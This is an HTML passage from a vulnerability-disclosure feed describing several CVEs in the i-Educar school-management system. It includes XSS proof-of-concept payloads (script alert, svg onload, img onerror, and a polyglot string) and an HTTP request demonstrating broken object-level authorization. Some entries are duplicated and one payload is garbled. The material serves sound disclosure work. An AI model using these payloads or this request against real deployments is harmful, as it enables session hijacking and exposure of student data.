class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mi">88</span><span class="p">,</span><span class="mi">83</span><span class="p">,</span><span class="mi">83</span><span class="p">))</</span><span class="nt">SCRIPT</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10590/image.png" width="1021" height="565" srcset="/p/cve-2025-10590/image_hu_f7f8725a4c3c24c2.png 480w, /p/cve-2025-10590/image_hu_2dd04bd1070639af.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="180" data-flex-basis="433px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-10590-cross-site-scripting-xss-reflected-in-endpoint-educar_usuario_detphp-parameter-ref_pessoa">CVE-2025-10590: Cross-Site Scripting (XSS) Reflected in endpoint <code>educar_usuario_det.php</code> parameter <code>ref_pessoa</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10590" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10590</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>educar_usuario_det.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>ref_pessoa</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>educar_usuario_det.php</code></p> <p>Parameter: <code>ref_pessoa</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl"> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,No known CVE><span class="p"></</span><span class="nt">SCRIPT</span><span class="p">></span>">'><span class="p"><</span><span class="nt">SCRIPT</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="nb">String</span><span class="p">.</span><span class="nx">fromCharCode</span><span class="p">(</span><span class="mi">88</span><span class="p">,</span><span class="mi">83</span><span class="p">,</span><span class="mi">83</span><span class="p">))</</span><span class="nt">SCRIPT</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10590/image.png" width="1021" height="565" srcset="/p/cve-2025-10590/image_hu_f7f8725a4c3c24c2.png 480w, /p/cve-2025-10590/image_hu_2dd04bd1070639af.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="180" data-flex-basis="433px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10590.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10591/ https://www.cvehunters.com/p/cve-2025-10591/ <h2 id="cve-2025-10591-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_funcao_cadphp">CVE-2025-10591: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_funcao_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10591" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10591</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_funcao_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>abreviatura</code> and <code>tipoacao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_funcao_cad.php</code></p><h2 id="cve-2025-10591-multiples-cross-site-scripting-xss-stored-in-endpoint-educar_funcao_cadphp">CVE-2025-10591: Multiples Cross-Site Scripting (XSS) Stored in endpoint <code>educar_funcao_cad.php</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10591" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10591</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the <code>educar_funcao_cad.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>abreviatura</code> and <code>tipoacao</code> parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/intranet/educar_funcao_cad.php</code></p> <p>Parameters: <code>abreviatura</code> and <code>tipoacao</code></p> <p style="text-align: justify;">The application fails to properly validate and sanitize user inputs in the <code>abreviatura</code> and <code>tipoacao</code> parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim's browser, potentially compromising the user's data and system.</p> <h2 id="poc">PoC </h2><h3 id="payload-1">Payload 1: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">svg</span> <span class="na">onload</span><span class="o">=</span><span class="s">alert(15888888)</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="payload-2">Payload 2: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10591/image.png" width="1193" height="615" srcset="/p/cve-2025-10591/image_hu_9dfb1cc0643b24b3.png 480w, /p/cve-2025-10591/image_hu_a0e3d84ac9dcf37.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="193" data-flex-basis="465px" /></p> <p><img src="/p/cve-2025-10591/image-1.png" width="1228" height="568" srcset="/p/cve-2025-10591/image-1_hu_1c1df20dcb8f0e5d.png 480w, /p/cve-2025-10591/image-1_hu_10a5213779d6b9a0.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="216" data-flex-basis="518px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10605/ https://www.cvehunters.com/p/cve-2025-10605/ <h2 id="cve-2025-10605-cross-site-scripting-xss-reflected-in-endpoint-agenda_preferenciasphp-parameter-tipoacao">CVE-2025-10605: Cross-Site Scripting (XSS) Reflected in endpoint <code>agenda_preferencias.php</code> parameter <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10605</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>agenda_preferencias.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>tipoacao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/agenda_preferencias.php</code></p> <p>Parameter: <code>tipoacao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10605/image.png" width="736" height="565" srcset="/p/cve-2025-10605/image_hu_61255b2402b529c7.png 480w, /p/cve-2025-10605/image_hu_f2589c925b0a1d14.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="130" data-flex-basis="312px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-10605-cross-site-scripting-xss-reflected-in-endpoint-agenda_preferenciasphp-parameter-tipoacao">CVE-2025-10605: Cross-Site Scripting (XSS) Reflected in endpoint <code>agenda_preferencias.php</code> parameter <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10605" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10605</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>agenda_preferencias.php</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>tipoacao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/agenda_preferencias.php</code></p> <p>Parameter: <code>tipoacao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">"><span class="p"><</span><span class="nt">script</span><span class="p">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'XSS-PoC'</span><span class="p">)</</span><span class="nt">script</span><span class="p">></span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10605/image.png" width="736" height="565" srcset="/p/cve-2025-10605/image_hu_61255b2402b529c7.png 480w, /p/cve-2025-10605/image_hu_f2589c925b0a1d14.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="130" data-flex-basis="312px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10606/ https://www.cvehunters.com/p/cve-2025-10606/ <h2 id="cve-2025-10606-cross-site-scripting-xss-reflected-in-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parameter-tipoacao">CVE-2025-10606: Cross-Site Scripting (XSS) Reflected in endpoint <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> parameter <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10606</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>tipoacao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code></p> <p>Parameter: <code>tipoacao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">%22%3E%3Cimg%20src=x%20onerror=alert('XSS-PoC4')%3E </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10606/image.png" width="746" height="542" srcset="/p/cve-2025-10606/image_hu_84c786b72df371af.png 480w, /p/cve-2025-10606/image_hu_80ea8e8254996711.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="330px" ></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p><h2 id="cve-2025-10606-cross-site-scripting-xss-reflected-in-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parameter-tipoacao">CVE-2025-10606: Cross-Site Scripting (XSS) Reflected in endpoint <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> parameter <code>tipoacao</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10606" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10606</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code> endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the <code>tipoacao</code> parameter.</p> <h2 id="details">Details </h2><p>Vulnerable Endpoint: <code>/module/Configuracao/ConfiguracaoMovimentoGeral</code></p> <p>Parameter: <code>tipoacao</code></p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-html" data-lang="html"><span class="line"><span class="cl">%22%3E%3Cimg%20src=x%20onerror=alert('XSS-PoC4')%3E </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10606/image.png" width="746" height="542" srcset="/p/cve-2025-10606/image_hu_84c786b72df371af.png 480w, /p/cve-2025-10606/image_hu_80ea8e8254996711.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="330px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Stealing session cookies: Attackers can use stolen session cookies to hijack a user's session and perform actions on their behalf.</li> <li>Downloading malware: Attackers can trick users into downloading and installing malware on their computers.</li> <li>Hijacking browsers: Attackers can hijack a user's browser or deliver browser-based exploits.</li> <li>Stealing credentials: Attackers can steal a user's credentials.</li> <li>Obtaining sensitive information: Attackers can obtain sensitive information stored in a user's account or in their browser.</li> <li>Defacing websites: Attackers can deface a website by altering its content.</li> <li>Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.</li> <li>Damaging a business's reputation: Attackers can damage a business's image or spread misinformation by defacing a corporate website.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10607/ https://www.cvehunters.com/p/cve-2025-10607/ <h2 id="cve-2025-10607-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleavaliacaodiarioapi">CVE-2025-10607: Broken Object Level Authorization (BOLA) allows enumeration of classes data via <code>/module/Avaliacao/diarioApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10607</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/Avaliacao/diarioApi</code> endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.</br></br>Although this vulnerability does not directly expose individual student data, it still constitutes an <b>unauthorized disclosure of academic structure information</b>, which can be leveraged for enumeration or as a stepping stone for further attacks.</p><h2 id="cve-2025-10607-broken-object-level-authorization-bola-allows-enumeration-of-classes-data-via-moduleavaliacaodiarioapi">CVE-2025-10607: Broken Object Level Authorization (BOLA) allows enumeration of classes data via <code>/module/Avaliacao/diarioApi</code> </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10607" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10607</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Object Level Authorization (BOLA) vulnerability was identified in the <code>/module/Avaliacao/diarioApi</code> endpoint of the i-Educar application.This flaw allows a user without proper permissions to query the endpoint and retrieve ** class information** by manipulating request parameters.</br></br>Although this vulnerability does not directly expose individual student data, it still constitutes an <b>unauthorized disclosure of academic structure information</b>, which can be leveraged for enumeration or as a stepping stone for further attacks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /module/Avaliacao/diarioApi</code></br></br>The application fails to enforce <b>object-level authorization</b>when handling this endpoint. As a result, any authenticated user can manipulate the request values to access sensitive information (names, IDs, enrollment status) of students.</p> <p style="text-align: justify;"><b>Expected behavior:</b><ul><li>Only authorized roles (e.g., administrators, coordinators, teachers linked to the class) should be able to access this data.</li><li>Unauthorized users should receive 403 Forbidden or an empty response.</li></ul></p> <p style="text-align: justify;"><b>Observed behavior:</br></b><ul><li>Any authenticated user (even low-privilege accounts) can access this endpoint and retrieve sensitive information about academic classes.</li></ul></p> <h2 id="poc">PoC </h2><p style="text-align: justify;"><ul><li>Authenticate as a non-privileged user (e.g., student, professor).</li></ul></p> <p><img src="/p/cve-2025-10607/image.png" width="1439" height="663" srcset="/p/cve-2025-10607/image_hu_25c2d9e3f461d49e.png 480w, /p/cve-2025-10607/image_hu_ecdded4f672254a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="217" data-flex-basis="520px" /></p> <p><img src="/p/cve-2025-10607/image-1.png" width="846" height="616" srcset="/p/cve-2025-10607/image-1_hu_29ac0d2382b460d0.png 480w, /p/cve-2025-10607/image-1_hu_5d2f89eaf0785474.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="137" data-flex-basis="329px" /></p> <p style="text-align: justify;"><ul><li>Send the following request:</li></ul></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">GET /module/Avaliacao/diarioApi?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12&busca=S&mostrar_botao_replicar_todos=1&ano=2025&ref_cod_instituicao=1&ref_cod_escola=3&ref_cod_curso=4&ref_cod_serie=6&ref_cod_turma=3&etapa=1&ref_cod_componente_curricular=11&ref_cod_matricula=12&navegacao_tab=2 HTTP/1.1 </span></span><span class="line"><span class="cl">Host: localhost </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: application/json, text/javascript, */*; q=0.01 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://localhost/module/Avaliacao/diario?&resource=matriculas&oper=get&instituicao_id=1&escola_id=3&curso_id=4&serie_id=undefined&turma_id=3&ano_escolar=2025&componente_curricular_id=11&etapa=1&matricula_id=12 </span></span><span class="line"><span class="cl">Cookie: educar_session=[low-privileged-session] </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Priority: u=0 </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-10607/image-2.png" width="1437" height="673" srcset="/p/cve-2025-10607/image-2_hu_b84de71ce4393634.png 480w, /p/cve-2025-10607/image-2_hu_47595ad6e39df54f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="213" data-flex-basis="512px" /></p> <p style="text-align: justify;"><ul><li>We could observe that informations about classes were returned.</li></ul></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">This vulnerability is a Broken Object Level Authorization (BOLA) issue (OWASP API Top 10 - 2023, A01), allowing sensitive data exposure. Any authenticated user can access personal information of other users. This can lead to: <ul> <li>Unauthorized access to sensitive PII;</li> <li>Violation of data protection laws (e.g., LGPD, GDPR);</li> <li>Potential abuse of user data or impersonation;</li> <li>User enumeration.</li> </ul> </p> <h2 id="reference">Reference </h2><p><em><strong><a class="link" href="https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md" target="_blank" rel="noopener" >https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10607.md</a></strong></em></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <blockquote> <p><em><strong>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></strong></em></p> </blockquote> Wed, 17 Sep 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-10608/ https://www.cvehunters.com/p/cve-2025-10608/ <h2 id="cve-2025-10608-broken-access-control-in-enrollment-historyid-endpoint">CVE-2025-10608: Broken Access Control in <code>/enrollment-history/[ID]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10608" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-10608</a></strong></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A Broken Access Control vulnerability was identified in the <code>/enrollment-history/[ID]</code> endpoint of the i-educar application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks.</p> <h2 id="details">Details </h2><p style="text-align: justify;"><b>Vulnerable Endpoint:</b> <code>GET /enrollment-history/[ID]</code></br><b>Authentication:</b> Required</br></br>The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .</p><h2 id="cve-2025-10608-broken-access-control-in-enrollment-historyid-endpoint">CVE-2025-10608: Broken Access Control in <code>/enrollment-history/[ID]</code> Endpoint </h2><blockquote> <p><em><strong>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-10608" target="_blank" rel="noopener" 